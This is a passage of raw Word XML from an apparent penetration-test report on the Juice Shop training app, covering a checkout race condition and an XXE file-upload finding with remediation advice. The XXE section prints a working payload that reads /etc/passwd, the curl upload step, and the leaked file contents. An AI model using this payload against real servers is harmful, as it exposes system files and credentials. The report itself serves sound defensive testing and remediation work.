        <w:t xml:space="preserve">: Confusion over multiple order confirmations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Shipping Costs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Potential duplicate shipping if not caught</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Data Integrity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Violation of one-basket-one-order business rule</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="125"/>
    <w:bookmarkStart w:id="126" w:name="root-cause"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The checkout process lacks:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Idempotency key validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Proper locking mechanism during order creation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Post-checkout basket state validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Duplicate order detection logic</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="126"/>
    <w:bookmarkStart w:id="127" w:name="affected-endpoints-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affected Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POST /rest/basket/{id}/checkout</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkStart w:id="129" w:name="remediation-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement idempotency keys for checkout requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use database transactions with row locking during checkout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set basket status to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ordered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">atomically after first checkout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reject checkout attempts on already-ordered baskets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement duplicate order detection based on basket ID + timestamp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add rate limiting on checkout endpoint per user/session</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42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evidence of race condition allowing 4 orders from single basket via parallel checkout requests:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId128">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-d02ca450-53b7-4634-92e4-6db8468e9436-18-business-logic-race-condition-checkout.json</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="129"/>
    <w:bookmarkStart w:id="131" w:name="finding-12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="130" w:name="X9842219ad5f902d3be8227ba6c251ca0516813b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XML External Entity (XXE) Injection via File Upload</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7.5</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId58">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">http://juiceshop:3000/file-upload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file upload endpoint at /file-upload is vulnerable to XML External Entity (XXE) injection when processing XML B2B invoice files. An attacker can upload a malicious XML file containing external entity references to read arbitrary files from the server’s filesystem.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="130"/>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkStart w:id="132" w:name="vulnerability-details-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The XML parser processes uploaded XML files without disabling external entity processing. When an attacker uploads an XML file with an external entity definition pointing to a local file, the entity is resolved and the file contents are included in the XML output.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="132"/>
    <w:bookmarkStart w:id="133" w:name="proof-of-concept-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Create malicious XML file with XXE payload</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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">xxe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"file:///etc/passwd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;xxe;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Upload the malicious XML file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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://juiceshop:3000/file-upload"</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"file=@xxe_test.xml"</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"message=test"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Observe file content disclosure in error response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The server responds with HTTP 410 Gone and includes the /etc/passwd file contents in the error message:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root:x:0:0:root:/root:/sbin/nologin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nobody:x:65534:65534:nobody:/nonexistent:/sbin/nologin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nonroot:x:65532:65532:nonroot:/home/nonroot:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkStart w:id="134" w:name="impact-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Arbitrary File Read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Access any file readable by the application process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Information Disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Extraction of configuration files, source code, credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Server Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Discovery of system users, paths, and architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Potential SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: May be extended to access internal network resources</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:id="135" w:name="affected-endpoints-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affected Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POST /file-upload (when XML files are uploaded)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="136" w:name="technical-details-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerability exists in the XML B2B invoice processing functionality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Even though the feature is marked as deprecated (returns 410), the XXE is still processed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The error message leaks the resolved entity content including file contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully exploited to read /etc/passwd, disclosing system user information</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:id="137" w:name="root-cause-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The XML parser is configured without disabling external entity processing. The DTD is processed and external entities are resolved, allowing file inclusion from the local filesystem.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="137"/>
    <w:bookmarkStart w:id="140" w:name="remediation-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable external entity processing in the XML parser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable DTD processing entirely if not required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a hardened XML parser configuration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> xml2js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">disallowDoctype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xmlType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checkChars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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement input validation to reject XML files containing DTD declarations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use allowlist-based validation for uploaded file content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider using safer data formats like JSON for B2B invoice processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XXE vulnerability proof showing /etc/passwd contents leaked in error response:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId138">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-2062c814-6db2-4bcc-8eea-c8873e384f4e-21-xxe-passwd-response.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XXE payload XML file used to exploit the vulnerability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId139">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-2062c814-6db2-4bcc-8eea-c8873e384f4e-22-xxe_test.xml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkStart w:id="142" w:name="appendix-a---lists-scripts-and-raw-data"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix A - Lists, Scripts and Raw Data</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkStart w:id="143"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93" Target="media/rId93.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId34" Target="media/rId34.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66" Target="media/rId66.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId120" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId97" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId39" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId55" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId58" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId65" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId33" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="https://www.first.org/cvss/v3.1/specification-document" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId138" Target="images/finding-2062c814-6db2-4bcc-8eea-c8873e384f4e-21-xxe-passwd-response.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId139" Target="images/finding-2062c814-6db2-4bcc-8eea-c8873e384f4e-22-xxe_test.xml" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId62" Target="images/finding-339a38ee-5c38-40f3-8acf-32b01f2e5a5e-4-misconfig-exposed-config.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId40" Target="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-1-sqli-baseline-apple.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId51" Target="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-15-sqli-extracted-credentials.txt" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId52" Target="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-17-sqli-test-summary.txt" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId41" Target="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-2-sqli-baseline-apple.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId78" Target="images/finding-3fdd0e16-0e1c-44a1-bd08-f50a108aad5b-9-misconfig-acquisitions-content.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId86" Target="images/finding-96393f3c-3173-4c3b-929f-9c7e85326a81-10-jwt-none-algorithm-bypass-20260227-004.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId128" Target="images/finding-d02ca450-53b7-4634-92e4-6db8468e9436-18-business-logic-race-condition-checkout.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId69" Target="images/finding-f1d5a2c5-eea8-4320-9642-c41e1bcf2c72-6-misconfig-stack-trace.html" TargetMode="External" /></Relationships>
</file>

